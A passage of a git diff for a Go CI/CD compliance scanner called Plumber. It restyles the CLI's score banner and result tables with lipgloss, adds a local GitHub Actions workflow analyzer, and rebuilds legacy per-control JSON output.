// The whole badge (borders + letter) is rendered in bold, using the letter's
// tier color so it reads as a single coherent visual token.
-func scoreLetterBadgeLines(letter string) []string {
- gc := scoreLetterColor(letter) + colorBold
- // 7 interior columns keep the letter nicely framed (3 spaces on each side).
- top := fmt.Sprintf("%sβββββββββ%s", gc, colorReset)
- mid := fmt.Sprintf("%sβ β%s", gc, colorReset)
- let := fmt.Sprintf("%sβ %s β%s", gc, letter, colorReset)
- bot := fmt.Sprintf("%sβββββββββ%s", gc, colorReset)
- return []string{top, mid, let, mid, bot}
-}
-
+// printSummaryScoreBanner renders the Plumber letter score in a
+// modernised two-column layout: a large grade badge on the left, and
+// a side panel on the right with points, progress bar, meaning text,
+// severity chips, and any Critical malus warning.
func printSummaryScoreBanner(score *control.PlumberScoreResult, scoreMode bool) {
if score == nil || !scoreMode {
return
}
- const indent = " "
- const gap = " "
- badge := scoreLetterBadgeLines(score.Score)
+ letterColor := scoreLetterLipglossColor(score.Score)
+
+ // Block-letter ASCII badge β six lines tall, matches the project
+ // banner lettering style.
+ badge := scoreLetterAsciiArt(score.Score)
+
+ letterStyle := lipgloss.NewStyle().Foreground(letterColor).Bold(true)
+ pointsLine := letterStyle.Render(fmt.Sprintf("%.0f / 100 pts", score.FinalPoints))
+ bar := scoreBar(score.FinalPoints, 28)
+ meaning := ""
+ if m := control.ScoreLetterMeaning(score.Score); m != "" {
+ meaning = styleMuted.Render(m)
+ }
+ chips := fmt.Sprintf("%s %s %s %s",
+ severityChip("critical", "Critical", score.Counts.Critical),
+ severityChip("high", "High", score.Counts.High),
+ severityChip("medium", "Medium", score.Counts.Medium),
+ severityChip("low", "Low", score.Counts.Low))
+
+ // Six-line side panel matching the block-letter badge height:
+ // blank line, points, bar, meaning, blank, chips.
+ side := lipgloss.JoinVertical(lipgloss.Left,
+ "",
+ pointsLine,
+ bar,
+ meaning,
+ "",
+ chips,
+ )
+ // lipgloss.JoinHorizontal vertically centers the two blocks; the
+ // side panel gets a small left gutter.
+ body := lipgloss.JoinHorizontal(lipgloss.Center,
+ badge,
+ lipgloss.NewStyle().PaddingLeft(2).Render(side),
+ )
+
+ sep := styleRule.Render(strings.Repeat("β", hrWidth))
- fmt.Printf(" %sβββ Plumber Score βββββββββββββββββββββββββββββββββββββ%s\n", colorCyan, colorReset)
+ fmt.Println()
+ fmt.Println(" " + sep)
+ fmt.Println(" " + styleMuted.Render("Plumber Score"))
+ fmt.Println()
+ fmt.Println(indentBlock(body, " "))
- gc := scoreLetterColor(score.Score)
- if meaning := control.ScoreLetterMeaning(score.Score); meaning != "" {
- fmt.Printf(" %s%s%s%s %s%s%s\n\n", colorBold, gc, score.Score, colorReset, colorDim, meaning, colorReset)
- } else {
+ if score.CriticalMalusApplied {
fmt.Println()
- }
- scoreLine := fmt.Sprintf("%s%s%.1f / 100 pts%s", colorBold, gc, score.FinalPoints, colorReset)
- bar := scoreBar(score.FinalPoints, 30)
- counts := fmt.Sprintf("%s%s Critical %s %-3d %s%s High %s %-3d %s Medium %s %-3d %s Low %s %-3d",
- colorBgRed, colorWhite, colorReset, score.Counts.Critical,
- colorBgYellow, colorBlack, colorReset, score.Counts.High,
- colorCyan, colorReset, score.Counts.Medium,
- colorBlue, colorReset, score.Counts.Low)
-
- // Side panel rows align with the 3 middle lines of the badge so the
- // badge reads as the primary visual and the metrics sit beside it.
- side := []string{"", scoreLine, bar, counts, ""}
- for i, b := range badge {
- if side[i] == "" {
- fmt.Printf("%s%s\n", indent, b)
- } else {
- fmt.Printf("%s%s%s%s\n", indent, b, gap, side[i])
- }
+ fmt.Printf(" %s %s\n",
+ styleFail.Render("β² Critical malus applied"),
+ styleMuted.Render(fmt.Sprintf("(final points capped at %.0f while any Critical remains)", score.CriticalMalusMax)))
}
- if score.CriticalMalusApplied {
- fmt.Printf("\n%s%sβ Critical malus: final points capped at %.0f%s\n", indent, colorRed, score.CriticalMalusMax, colorReset)
- }
+ fmt.Println()
+ fmt.Println(" " + sep)
+ fmt.Println()
+}
- fmt.Printf("\n %sβββββββββββββββββββββββββββββββββββββββββββββββββββββββ%s\n\n", colorDim, colorReset)
+// severityChip renders a single severity count as an emoji + label +
+// colored count, used by the modern score banner.
+func severityChip(sev, label string, n int) string {
+ countStyle := lipgloss.NewStyle().Foreground(severityColor(sev)).Bold(true)
+ return severityIcon(sev) + " " + styleMuted.Render(label) + " " + countStyle.Render(fmt.Sprintf("%d", n))
}
func printIssuesTable(controls []controlSummary) {
@@ -1768,212 +1340,137 @@ func printIssuesTable(controls []controlSummary) {
}
}
- fmt.Printf(" %sControls%s\n", colorBold, colorReset)
+ fmt.Printf(" %s\n", styleTitle.Render("Controls"))
if len(rows) == 0 {
- fmt.Printf(" %s(none with open issues)%s\n", colorDim, colorReset)
+ fmt.Printf(" %s\n", styleDim.Render("(none with open issues)"))
return
}
sortControlSummariesForIssuesTable(rows)
- controlWidth := 44
- for _, ctrl := range rows {
- needed := len(ctrl.name) + 2
- if needed > controlWidth {
- controlWidth = needed
- }
- }
- codesWidth := 22
- for _, ctrl := range rows {
- codesStr := strings.Join(ctrl.codes, ", ")
- needed := len(codesStr) + 2
- if needed > codesWidth {
- codesWidth = needed
- }
- }
- sevWidth := 12
- issuesWidth := 6
-
- // Top border
- fmt.Printf(" %sβ%sβ€%sβ€%sβ€%sβ%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", codesWidth),
- strings.Repeat("β", sevWidth),
- strings.Repeat("β", issuesWidth),
- colorReset)
-
- // Header row
- fmt.Printf(" %sβ%s %-*s %sβ%s %-*s %sβ%s %-*s %sβ%s %*s %sβ%s\n",
- colorCyan, colorReset,
- controlWidth-2, "Control",
- colorCyan, colorReset,
- codesWidth-2, "Codes",
- colorCyan, colorReset,
- sevWidth-2, "Severity",
- colorCyan, colorReset,
- issuesWidth-2, "#",
- colorCyan, colorReset)
-
- // Header separator
- fmt.Printf(" %sβ%sβΌ%sβΌ%sβΌ%sβ’%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", codesWidth),
- strings.Repeat("β", sevWidth),
- strings.Repeat("β", issuesWidth),
- colorReset)
+ tbl := table.New().
+ Border(lipgloss.RoundedBorder()).
+ BorderStyle(styleAccent).
+ Headers("Control", "Codes", "Severity", "#").
+ StyleFunc(func(row, col int) lipgloss.Style {
+ if row == table.HeaderRow {
+ return styleHeader
+ }
+ if col == 3 && row >= 0 && row < len(rows) && rows[row].issues > 0 {
+ return styleCell.Inherit(styleError)
+ }
+ return styleCell
+ })
for _, ctrl := range rows {
issueStr := "-"
if !ctrl.skipped {
issueStr = fmt.Sprintf("%d", ctrl.issues)
}
- issueColor := colorReset
- if ctrl.issues > 0 {
- issueColor = colorRed
- }
-
codesStr := strings.Join(ctrl.codes, ", ")
if ctrl.skipped {
codesStr = "-"
}
-
- sevLabel := highestSeverityLabel(ctrl.bySeverity, sevWidth-2)
+ sevLabel := highestSeverityLabel(ctrl.bySeverity, 10)
if ctrl.skipped || ctrl.bySeverity.Critical+ctrl.bySeverity.High+ctrl.bySeverity.Medium+ctrl.bySeverity.Low == 0 {
- sevLabel = highestSeverityLabel(control.SeverityCounts{}, sevWidth-2)
+ sevLabel = highestSeverityLabel(control.SeverityCounts{}, 10)
}
+ tbl.Row(ctrl.name, codesStr, sevLabel, issueStr)
+ }
+
+ fmt.Println(indentBlock(tbl.String(), " "))
+ fmt.Printf(" %s\n", styleDim.Render("β³ docs: https://getplumber.io/docs/use-plumber/issues/"))
+}
- fmt.Printf(" %sβ%s %-*s %sβ%s %-*s %sβ%s %s %sβ%s %s%*s%s %sβ%s\n",
- colorCyan, colorReset,
- controlWidth-2, ctrl.name,
- colorCyan, colorReset,
- codesWidth-2, codesStr,
- colorCyan, colorReset,
- sevLabel,
- colorCyan, colorReset,
- issueColor, issuesWidth-2, issueStr, colorReset,
- colorCyan, colorReset)
- }
-
- // Bottom border
- fmt.Printf(" %sβ%sβ§%sβ§%sβ§%sβ%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", codesWidth),
- strings.Repeat("β", sevWidth),
- strings.Repeat("β", issuesWidth),
- colorReset)
-
- fmt.Printf(" %sβ³ docs: https://getplumber.io/docs/use-plumber/issues/%s\n", colorDim, colorReset)
+// indentBlock prefixes every line of s with prefix. Used because
+// lipgloss tables render flush-left and we want a little left margin.
+func indentBlock(s, prefix string) string {
+ lines := strings.Split(strings.TrimRight(s, "\n"), "\n")
+ for i, l := range lines {
+ lines[i] = prefix + l
+ }
+ return strings.Join(lines, "\n")
}
func printComplianceTable(controls []controlSummary, overallCompliance, threshold float64) {
- fmt.Printf(" %sCompliance%s\n", colorBold, colorReset)
+ fmt.Printf(" %s\n", styleTitle.Render("Compliance"))
sorted := append([]controlSummary(nil), controls...)
sortControlSummariesForComplianceTable(sorted)
- // Calculate column widths dynamically based on longest control name
- controlWidth := 52 // minimum width
- for _, ctrl := range sorted {
- needed := len(ctrl.name) + 2 // +2 for padding
- if needed > controlWidth {
- controlWidth = needed
- }
- }
- complianceWidth := 12
- statusWidth := 10
-
- // Top border
- fmt.Printf(" %sβ%sβ€%sβ€%sβ%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", complianceWidth),
- strings.Repeat("β", statusWidth),
- colorReset)
-
- // Header row
- fmt.Printf(" %sβ%s %-*s %sβ%s %*s %sβ%s %*s %sβ%s\n",
- colorCyan, colorReset,
- controlWidth-2, "Control",
- colorCyan, colorReset,
- complianceWidth-2, "Compliance",
- colorCyan, colorReset,
- statusWidth-2, "Status",
- colorCyan, colorReset)
-
- // Header separator
- fmt.Printf(" %sβ%sβΌ%sβΌ%sβ’%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", complianceWidth),
- strings.Repeat("β", statusWidth),
- colorReset)
-
- // Data rows
+ // Total line rendered as an extra row at the bottom. We remember its
+ // index so StyleFunc can make it bold.
+ type rowKind int
+ const (
+ rowControl rowKind = iota
+ rowTotal
+ )
+ type tblRow struct {
+ kind rowKind
+ name string
+ compStr string
+ status string
+ compOK bool
+ }
+
+ var rows []tblRow
for _, ctrl := range sorted {
- compStr := "-"
- statusStr := "-"
- compColor := colorReset
- statusColor := colorDim
-
+ r := tblRow{kind: rowControl, name: ctrl.name, compStr: "-", status: "-"}
if !ctrl.skipped {
- compStr = fmt.Sprintf("%.1f%%", ctrl.compliance)
- if ctrl.compliance >= 100 {
- compColor = colorGreen
- statusColor = colorGreen
- statusStr = "β"
+ r.compStr = fmt.Sprintf("%.1f%%", ctrl.compliance)
+ r.compOK = ctrl.compliance >= 100
+ if r.compOK {
+ r.status = "π’"
} else {
- compColor = colorRed
- statusColor = colorRed
- statusStr = "β"
+ r.status = "π΄"
}
}
+ rows = append(rows, r)
+ }
+ totalRow := tblRow{
+ kind: rowTotal,
+ name: fmt.Sprintf("Total (required: %.0f%%)", threshold),
+ compStr: fmt.Sprintf("%.1f%%", overallCompliance),
+ compOK: overallCompliance >= threshold,
+ }
+ if totalRow.compOK {
+ totalRow.status = "π’"
+ } else {
+ totalRow.status = "π΄"
+ }
+ rows = append(rows, totalRow)
+
+ tbl := table.New().
+ Border(lipgloss.RoundedBorder()).
+ BorderStyle(styleAccent).
+ Headers("Control", "Compliance", "Status").
+ StyleFunc(func(row, col int) lipgloss.Style {
+ if row == table.HeaderRow {
+ return styleHeader
+ }
+ if row < 0 || row >= len(rows) {
+ return styleCell
+ }
+ r := rows[row]
+ style := styleCell
+ if r.kind == rowTotal {
+ style = style.Bold(true)
+ }
+ if col == 1 || col == 2 {
+ if r.compStr == "-" {
+ return style.Faint(true)
+ }
+ if r.compOK {
+ return style.Inherit(styleSuccess)
+ }
+ return style.Inherit(styleError)
+ }
+ return style
+ })
+
+ for _, r := range rows {
+ tbl.Row(r.name, r.compStr, r.status)
+ }
- fmt.Printf(" %sβ%s %-*s %sβ%s %s%*s%s %sβ%s %s%*s%s %sβ%s\n",
- colorCyan, colorReset,
- controlWidth-2, ctrl.name,
- colorCyan, colorReset,
- compColor, complianceWidth-2, compStr, colorReset,
- colorCyan, colorReset,
- statusColor, statusWidth-2, statusStr, colorReset,
- colorCyan, colorReset)
- }
-
- // Separator before total
- fmt.Printf(" %sβ%sβΌ%sβΌ%sβ’%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", complianceWidth),
- strings.Repeat("β", statusWidth),
- colorReset)
-
- // Total row
- totalCompStr := fmt.Sprintf("%.1f%%", overallCompliance)
- totalStatus := "β"
- totalCompColor := colorGreen
- totalStatusColor := colorGreen
- if overallCompliance < threshold {
- totalStatus = "β"
- totalCompColor = colorRed
- totalStatusColor = colorRed
- }
-
- fmt.Printf(" %sβ%s %s%-*s%s %sβ%s %s%*s%s %sβ%s %s%*s%s %sβ%s\n",
- colorCyan, colorReset,
- colorBold, controlWidth-2, fmt.Sprintf("Total (required: %.0f%%)", threshold), colorReset,
- colorCyan, colorReset,
- totalCompColor, complianceWidth-2, totalCompStr, colorReset,
- colorCyan, colorReset,
- totalStatusColor, statusWidth-2, totalStatus, colorReset,
- colorCyan, colorReset)
-
- // Bottom border
- fmt.Printf(" %sβ%sβ§%sβ§%sβ%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", complianceWidth),
- strings.Repeat("β", statusWidth),
- colorReset)
+ fmt.Println(indentBlock(tbl.String(), " "))
}
diff --git a/cmd/analyze_github.go b/cmd/analyze_github.go
new file mode 100644
index 0000000..fba2a12
--- /dev/null
+++ b/cmd/analyze_github.go
@@ -0,0 +1,198 @@
+package cmd
+
+import (
+ "fmt"
+ "os"
+ "sort"
+ "strings"
+
+ "github.com/getplumber/plumber/configuration"
+ "github.com/getplumber/plumber/control"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/utils"
+ "github.com/sirupsen/logrus"
+ "github.com/spf13/cobra"
+)
+
+// runGitHubAnalyze handles `plumber analyze` for GitHub-hosted projects.
+// Local-only MVP: walks .github/workflows/*.{yml,yaml} under the detected
+// git repo root, evaluates the embedded Rego policies, and prints /
+// writes the resulting findings. No GitHub API call, no token required.
+//
+// Returns an error (exit code 1) when at least one finding is reported,
+// so the command can gate CI pipelines without any threshold flag.
+func runGitHubAnalyze(cmd *cobra.Command, info *utils.GitRemoteInfo) error {
+ fmt.Fprintf(os.Stderr, "Auto-detected GitHub project: %s\n", info.ProjectPath)
+
+ plumberConfig, configPath, configWarnings, err := configuration.LoadPlumberConfig(configFile)
+ if err != nil {
+ if strings.Contains(err.Error(), "config file not found") {
+ return fmt.Errorf("configuration file not found: %w. Create one with `plumber config generate` or `plumber config init`", err)
+ }
+ return fmt.Errorf("configuration error: %w", err)
+ }
+ if len(configWarnings) > 0 {
+ fmt.Fprintf(os.Stderr, "Configuration validation warnings:\n")
+ for _, w := range configWarnings {
+ fmt.Fprintf(os.Stderr, " - %s\n", w)
+ }
+ if failWarnings {
+ return fmt.Errorf("configuration has %d warning(s) and --fail-warnings is set", len(configWarnings))
+ }
+ }
+ fmt.Fprintf(os.Stderr, "Using configuration: %s\n", configPath)
+
+ if printOutput {
+ printBanner()
+ }
+
+ conf := configuration.NewDefaultConfiguration()
+ conf.ProjectPath = info.ProjectPath
+ conf.GitRepoRoot = info.RepoRoot
+ conf.Branch = defaultBranch
+ conf.PlumberConfig = plumberConfig
+ if verbose {
+ conf.LogLevel = logrus.DebugLevel
+ }
+
+ fmt.Fprintf(os.Stderr, "Scanning workflows under: %s\n", info.RepoRoot)
+
+ // Progress spinner β mirrors the GitLab path. Only installed
+ // when we are printing to stdout and not running verbose (the
+ // spinner races with log lines in verbose mode).
+ sp := newSpinner()
+ if printOutput && !verbose {
+ conf.ProgressFunc = func(step, total int, message string) {
+ sp.Update(step, total, message)
+ }
+ sp.InstallLogHook()
+ sp.Start()
+ }
+
+ result, err := control.RunGitHubAnalysis(conf)
+ sp.Stop()
+ if err != nil {
+ return fmt.Errorf("analysis failed: %w", err)
+ }
+
+ // Compute the Plumber letter score on demand. The pipeline
+ // (AggregateSeverityCounts β ComputePlumberScore) is the same one
+ // used on GitLab, so the letter is definition-compatible across
+ // providers.
+ scoreMode := showScore || showScorePoint
+ var scoreResult *control.PlumberScoreResult
+ if scoreMode {
+ counts := control.AggregateSeverityCounts(result)
+ s := control.ComputePlumberScore(counts)
+ scoreResult = &s
+ }
+
+ // Binary compliance on the GitHub path for now: pass when there is no
+ // finding, fail otherwise. A per-rule compliance model matching the
+ // GitLab controls (each control averages its own compliance) will come
+ // alongside the CLI threshold flag work.
+ compliance := 100.0
+ if len(result.Findings) > 0 {
+ compliance = 0.0
+ }
+
+ if outputFile != "" {
+ if err := writeJSONToFile(result, conf.PlumberConfig, threshold, compliance, outputFile, scoreResult, scoreMode); err != nil {
+ return err
+ }
+ fmt.Fprintf(os.Stderr, "Results written to: %s\n", outputFile)
+ }
+
+ if printOutput {
+ printGitHubFindings(result, compliance)
+ printSummaryScoreBanner(scoreResult, scoreMode)
+ if showScorePoint {
+ printScoreBreakdown(scoreResult)
+ }
+ }
+
+ if len(result.Findings) > 0 {
+ return &ComplianceError{Compliance: compliance, Threshold: threshold}
+ }
+ return nil
+}
+
+// printGitHubFindings writes the GitHub analyze output in the same
+// visual style as the GitLab path: project header, a per-rule detail
+// block for each rule that produced findings, a controls summary
+// table, a compliance table with a total line. Detail rendering is
+// delegated to the shared renderFindingGroups so the visual contract
+// is identical across providers.
+func printGitHubFindings(result *control.AnalysisResult, overallCompliance float64) {
+ fmt.Printf("\n%s %s\n\n", styleTitle.Render("Project:"), result.ProjectPath)
+
+ if !result.CiValid {
+ fmt.Printf(" %s\n", styleDim.Render("No GitHub Actions workflows discovered."))
+ return
+ }
+
+ renderFindingGroups(findingGroupsFromRegoFindings(result.Findings))
+
+ summaries := summariesFromFindings(result.Findings)
+ if len(summaries) == 0 {
+ fmt.Printf(" %s\n\n", styleSuccess.Render("β No findings. All policies pass."))
+ return
+ }
+
+ printIssuesTable(summaries)
+ fmt.Println()
+ printComplianceTable(summaries, overallCompliance, 100)
+}
+
+// summariesFromFindings projects the Rego engine's flat list of
+// findings onto the same []controlSummary shape the GitLab path builds
+// from its legacy Go controls. Findings are grouped by the ControlName
+// advertised in the issue-code registry; each summary reports one
+// entry per policy that produced at least one finding, with a
+// per-policy compliance of 0 (binary model on the GitHub side).
+func summariesFromFindings(findings []opaengine.Finding) []controlSummary {
+ byControl := map[string]*controlSummary{}
+ for _, f := range findings {
+ info := control.LookupCode(control.ErrorCode(f.Code))
+ name := f.Code
+ if info != nil && info.ControlName != "" {
+ name = info.ControlName
+ }
+ sum, ok := byControl[name]
+ if !ok {
+ sum = &controlSummary{name: name, compliance: 0}
+ byControl[name] = sum
+ }
+ sum.issues++
+ if !containsString(sum.codes, f.Code) {
+ sum.codes = append(sum.codes, f.Code)
+ }
+ switch control.SeverityForCode(control.ErrorCode(f.Code)) {
+ case control.SeverityCritical:
+ sum.bySeverity.Critical++
+ case control.SeverityHigh:
+ sum.bySeverity.High++
+ case control.SeverityMedium:
+ sum.bySeverity.Medium++
+ case control.SeverityLow:
+ sum.bySeverity.Low++
+ }
+ }
+
+ out := make([]controlSummary, 0, len(byControl))
+ for _, s := range byControl {
+ sort.Strings(s.codes)
+ out = append(out, *s)
+ }
+ sort.Slice(out, func(i, j int) bool { return out[i].name < out[j].name })
+ return out
+}
+
+func containsString(s []string, v string) bool {
+ for _, e := range s {
+ if e == v {
+ return true
+ }
+ }
+ return false
+}
diff --git a/cmd/legacy_json.go b/cmd/legacy_json.go
new file mode 100644
index 0000000..d51e283
--- /dev/null
+++ b/cmd/legacy_json.go
@@ -0,0 +1,876 @@
+package cmd
+
+import (
+ "sort"
+ "strings"
+
+ "github.com/getplumber/plumber/collector"
+ "github.com/getplumber/plumber/configuration"
+ "github.com/getplumber/plumber/control"
+ "github.com/getplumber/plumber/gitlab"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/utils"
+)
+
+// _minAccessLevelGitlab returns the smallest accessLevel found in
+// the list β the effective minimum required level for push or merge
+// in a GitLab branch protection rule. Returns 0 when the list is
+// empty (no rule, "no one" can do it).
+func _minAccessLevelGitlab(levels []gitlab.BranchProtectionAccessLevel) int {
+ min := 0
+ for i, l := range levels {
+ if i == 0 || l.AccessLevel < min {
+ min = l.AccessLevel
+ }
+ }
+ return min
+}
+
+// legacyResultsByName builds the per-control `*Result` JSON blocks
+// that the v0.2.x analyzer emitted alongside the bare findings list.
+// External consumers (CI gates, dashboards, MR comment generators)
+// learned to parse those blocks: each control's issues list, its
+// `metrics` object, and the binary `compliance` flag travel together
+// under a stable JSON key. The Rego port had collapsed them into a
+// single `findings` array, so we reconstruct them here from the IR
+// data still attached to AnalysisResult plus the bucketed Rego
+// findings.
+//
+// Returned map keys match the legacy JSON field names
+// (imageForbiddenTagsResult, imageAuthorizedSourcesResult, β¦) so the
+// caller can splice them straight into the output struct.
+func legacyResultsByName(result *control.AnalysisResult, pc *configuration.PlumberConfig) map[string]any {
+ if result == nil || pc == nil {
+ return nil
+ }
+ out := map[string]any{}
+ findingsByControl := control.FindingsByControl(result.Findings)
+
+ for _, e := range control.GitLabControls(pc) {
+ fs := findingsByControl[e.ControlName]
+ key, block := buildLegacyResult(e, result, pc, fs)
+ if key == "" {
+ continue
+ }
+ out[key] = block
+ }
+ return out
+}
+
+// buildLegacyResult routes a control entry to its legacy JSON
+// builder and returns the (jsonKey, block) pair.
+func buildLegacyResult(e control.ControlEntry, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) (string, any) {
+ compliance := 100.0
+ if !e.Skipped && len(findings) > 0 {
+ compliance = 0
+ }
+ common := legacyCommon{
+ Compliance: compliance,
+ CiValid: result.CiValid,
+ CiMissing: result.CiMissing,
+ Skipped: e.Skipped,
+ }
+
+ switch e.ControlName {
+ case "containerImageMustNotUseForbiddenTags":
+ return "imageForbiddenTagsResult", buildImageForbiddenTagsBlock(common, result, pc, findings)
+ case "containerImageMustComeFromAuthorizedSources":
+ return "imageAuthorizedSourcesResult", buildImageAuthorizedSourcesBlock(common, result, findings)
+ case "branchMustBeProtected":
+ return "branchProtectionResult", buildBranchProtectionBlock(common, result, pc, findings)
+ case "pipelineMustNotIncludeHardcodedJobs":
+ return "hardcodedJobsResult", buildHardcodedJobsBlock(common, result, findings)
+ case "includesMustBeUpToDate":
+ return "outdatedIncludesResult", buildOutdatedIncludesBlock(common, result, findings)
+ // (jobNameKey is dropped for the outdated builder β the legacy
+ // shape replaces `job` with `gitlabIncludeLocation`.)
+ case "includesMustNotUseForbiddenVersions":
+ return "forbiddenVersionsIncludesResult", buildForbiddenVersionsBlock(common, result, findings)
+ case "pipelineMustIncludeComponent":
+ return "requiredComponentsResult", buildRequirementGroupsBlock(common, pc.Controls.PipelineMustIncludeComponent, result, findings)
+ case "pipelineMustIncludeTemplate":
+ return "requiredTemplatesResult", buildRequirementGroupsTemplateBlock(common, pc.Controls.PipelineMustIncludeTemplate, result, findings)
+ case "pipelineMustNotEnableDebugTrace":
+ return "debugTraceResult", buildDebugTraceBlock(common, result, findings)
+ case "pipelineMustNotUseUnsafeVariableExpansion":
+ return "variableInjectionResult", buildVariableInjectionBlock(common, result, findings)
+ case "securityJobsMustNotBeWeakened":
+ return "securityJobsWeakenedResult", buildSecurityJobsBlock(common, result, pc, findings)
+ case "pipelineMustNotExecuteUnverifiedScripts":
+ return "unverifiedScriptsResult", buildUnverifiedScriptsBlock(common, result, findings)
+ case "pipelineMustNotOverrideJobVariables":
+ return "jobVariablesOverrideResult", buildJobVariablesOverrideBlock(common, result, findings)
+ case "pipelineMustNotUseDockerInDocker":
+ return "dockerInDockerResult", buildDockerInDockerBlock(common, result, findings)
+ }
+ return "", nil
+}
+
+// legacyCommon carries the bookkeeping fields shared by every
+// `*Result` block: compliance, ciValid, ciMissing, skipped.
+type legacyCommon struct {
+ Compliance float64
+ CiValid bool
+ CiMissing bool
+ Skipped bool
+}
+
+// projectFinding strips the verbose Rego-side fields (severity,
+// message, file, line) so the returned issue keeps only what the
+// legacy format documented: code, docUrl, plus whatever structured
+// payload the rule emitted (link/tag/variableName/β¦).
+func projectFinding(f opaengine.Finding, jobNameKey string) map[string]any {
+ out := map[string]any{
+ "code": f.Code,
+ "docUrl": "https://getplumber.io/docs/use-plumber/issues/" + f.Code,
+ }
+ if f.Job != "" && jobNameKey != "" {
+ out[jobNameKey] = f.Job
+ }
+ for k, v := range f.Data {
+ if k == "docUrl" {
+ continue
+ }
+ out[k] = v
+ }
+ return out
+}
+
+func projectFindings(findings []opaengine.Finding, jobNameKey string) []map[string]any {
+ out := make([]map[string]any, 0, len(findings))
+ for _, f := range findings {
+ out = append(out, projectFinding(f, jobNameKey))
+ }
+ return out
+}
+
+// _sortedFindings returns findings in a stable total order so legacy JSON
+// issues[] do not flip between runs when Job matches (e.g. two codes on the
+// same job). Primary key is Job, then Code, File, Line, Message β aligned
+// with the OPA engine aggregate sort.
+func _sortedFindings(findings []opaengine.Finding) []opaengine.Finding {
+ out := make([]opaengine.Finding, len(findings))
+ copy(out, findings)
+ sort.SliceStable(out, func(i, j int) bool {
+ a, b := out[i], out[j]
+ switch {
+ case a.Job != b.Job:
+ return a.Job < b.Job
+ case a.Code != b.Code:
+ return a.Code < b.Code
+ case a.File != b.File:
+ return a.File < b.File
+ case a.Line != b.Line:
+ return a.Line < b.Line
+ default:
+ return a.Message < b.Message
+ }
+ })
+ return out
+}
+
+// _branchProtectionEntryForName returns the first GitLab protection rule
+// whose pattern matches the branch name, consistent with the
+// protectionByBranch indexing in buildBranchProtectionBlock.
+func _branchProtectionEntryForName(data *collector.GitlabProtectionAnalysisData, branchName string) *gitlab.BranchProtection {
+ if data == nil || branchName == "" {
+ return nil
+ }
+ for i := range data.BranchProtections {
+ p := &data.BranchProtections[i]
+ if _matchesAnyGlob(branchName, []string{p.ProtectionPattern}) {
+ return p
+ }
+ }
+ return nil
+}
+
+// enrichBranchProtection505IssueMaps restores the v0.2.x issue shape for
+// ISSUE-505: *Display flags and codeOwnerApprovalRequired from the
+// protection API (Rego alone cannot express the legacy display semantics).
+func enrichBranchProtection505IssueMaps(issues []map[string]any, result *control.AnalysisResult, pc *configuration.PlumberConfig) {
+ var cfg *configuration.BranchProtectionControlConfig
+ if pc != nil {
+ cfg = pc.Controls.BranchMustBeProtected
+ }
+ allowForcePushPolicy := false
+ if cfg != nil && cfg.AllowForcePush != nil {
+ allowForcePushPolicy = *cfg.AllowForcePush
+ }
+ codeOwnerPolicy := false
+ if cfg != nil && cfg.CodeOwnerApprovalRequired != nil {
+ codeOwnerPolicy = *cfg.CodeOwnerApprovalRequired
+ }
+ minMergePolicy := 0
+ if cfg != nil && cfg.MinMergeAccessLevel != nil {
+ minMergePolicy = *cfg.MinMergeAccessLevel
+ }
+ minPushPolicy := 0
+ if cfg != nil && cfg.MinPushAccessLevel != nil {
+ minPushPolicy = *cfg.MinPushAccessLevel
+ }
+ for _, issue := range issues {
+ code, _ := issue["code"].(string)
+ if code != string(control.CodeBranchNonCompliant) {
+ continue
+ }
+ branchName, _ := issue["branchName"].(string)
+ if branchName == "" {
+ if j, ok := issue["job"].(string); ok {
+ branchName = j
+ }
+ }
+ if branchName == "" {
+ continue
+ }
+ if result == nil || result.ProtectionData == nil {
+ continue
+ }
+ p := _branchProtectionEntryForName(result.ProtectionData, branchName)
+ if p == nil {
+ continue
+ }
+ branchAllow := p.AllowForcePush
+ branchCodeOwner := p.CodeOwnerApprovalRequired
+ branchMinMerge := _minAccessLevelGitlab(p.MergeAccessLevels)
+ branchMinPush := _minAccessLevelGitlab(p.PushAccessLevels)
+ issue["codeOwnerApprovalRequired"] = branchCodeOwner
+ // controlGitlabProtectionBranchProtectionNotCompliant.go display bits
+ if !allowForcePushPolicy && branchAllow {
+ issue["allowForcePushDisplay"] = true
+ } else {
+ delete(issue, "allowForcePushDisplay")
+ }
+ if codeOwnerPolicy && !branchCodeOwner {
+ issue["codeOwnerApprovalRequiredDisplay"] = true
+ } else {
+ delete(issue, "codeOwnerApprovalRequiredDisplay")
+ }
+ if branchMinMerge != 0 && (minMergePolicy == 0 || minMergePolicy > branchMinMerge) {
+ issue["minMergeAccessLevelDisplay"] = true
+ } else {
+ delete(issue, "minMergeAccessLevelDisplay")
+ }
+ if branchMinPush != 0 && (minPushPolicy == 0 || minPushPolicy > branchMinPush) {
+ issue["minPushAccessLevelDisplay"] = true
+ } else {
+ delete(issue, "minPushAccessLevelDisplay")
+ }
+ }
+}
+
+func _originByIncludeSource(data *collector.GitlabPipelineOriginData, source string) *collector.GitlabPipelineOriginDataFull {
+ if data == nil || source == "" {
+ return nil
+ }
+ cleanedWant := utils.CleanOriginPath(source)
+ for i := range data.Origins {
+ o := &data.Origins[i]
+ loc := o.GitlabIncludeOrigin.Location
+ if loc == "" {
+ loc = o.GitlabComponent.ComponentIncludePath
+ }
+ if loc == source || (loc != "" && utils.CleanOriginPath(loc) == cleanedWant) {
+ return o
+ }
+ }
+ return nil
+}
+
+// enrichForbiddenVersion404IssueMaps restores the v0.1.x
+// GitlabPipelineIncludesForbiddenVersionIssue fields from
+// collector data (Rego only emits a slim finding).
+func enrichForbiddenVersion404IssueMaps(issues []map[string]any, result *control.AnalysisResult) {
+ if result == nil || result.PipelineOriginData == nil {
+ return
+ }
+ for _, issue := range issues {
+ code, _ := issue["code"].(string)
+ if code != string(control.CodeIncludeForbiddenVersion) {
+ continue
+ }
+ src, _ := issue["job"].(string)
+ if src == "" {
+ continue
+ }
